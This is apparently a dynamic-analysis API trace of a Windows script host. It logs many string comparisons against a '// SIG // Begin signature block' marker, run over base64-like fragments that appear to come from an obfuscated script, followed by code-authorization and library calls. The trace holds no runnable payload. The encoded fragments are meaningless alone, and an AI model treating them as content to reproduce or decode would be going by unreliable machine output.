	[0116.819] wcsncmp (_String1="wpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.819] wcsncmp (_String1="pbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0116.819] wcsncmp (_String1="bCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0116.819] wcsncmp (_String1="Cjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0116.819] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0116.819] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0116.819] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0116.819] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0116.819] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0116.819] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.819] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0116.819] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0116.819] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0116.819] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0116.819] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0116.819] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0116.819] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0116.819] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0116.819] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0116.819] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0116.819] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.819] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0116.819] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0116.819] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.819] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0116.819] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0116.819] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0116.819] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.819] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.819] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0116.819] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0116.820] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0116.820] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0116.820] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.820] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0116.820] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.820] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0116.820] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0116.820] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0116.820] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.820] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0116.820] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0116.820] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0116.820] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0116.820] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0116.820] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0116.820] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0116.820] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0116.820] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.820] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0116.820] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0116.820] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.820] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.820] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0116.820] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0116.820] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0116.821] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0116.821] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0116.821] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0116.821] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0116.821] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.821] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0116.821] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.821] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.821] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0116.821] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0116.821] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0116.821] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0116.821] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0116.821] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0116.821] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0116.821] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0116.821] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0116.821] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0116.821] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0116.821] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0116.821] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.821] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0116.821] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0116.821] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0116.821] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.821] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0116.821] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0116.821] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.821] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0116.821] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.821] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0116.821] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0116.821] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0116.821] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0116.821] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.821] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0116.821] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0116.821] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.822] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0116.822] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0116.822] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0116.822] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0116.822] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0116.822] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0116.822] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0116.822] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0116.822] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0116.822] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0116.822] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0116.822] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0116.822] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.822] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0116.822] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.822] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.822] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0116.822] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0116.822] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.822] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0116.822] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.822] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0116.822] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0116.822] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.822] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0116.822] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0116.822] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.822] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0116.822] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0116.822] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0116.822] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0116.822] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0116.822] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0116.822] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0116.822] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0116.822] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.822] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0116.823] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0116.823] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.823] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0116.823] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0116.823] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.823] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0116.823] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0116.823] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0116.823] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0116.823] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0116.823] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0116.823] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0116.823] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.823] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0116.823] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0116.823] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0116.823] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0116.823] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0116.823] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0116.823] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0116.823] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0116.823] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0116.823] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0116.823] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0116.823] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.823] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0116.823] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0116.823] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0116.823] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0116.823] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0116.823] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0116.823] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0116.823] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0116.823] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0116.823] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0116.823] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0116.823] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0116.826] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0116.826] CloseCodeAuthzLevel () returned 0x1
	[0116.826] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0116.826] ??2@YAPEAX_K@Z () returned 0x3bf3f0
